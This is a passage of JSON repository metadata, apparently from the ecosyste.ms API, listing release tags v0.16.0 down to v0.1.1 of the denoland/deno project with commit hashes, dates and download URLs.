manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":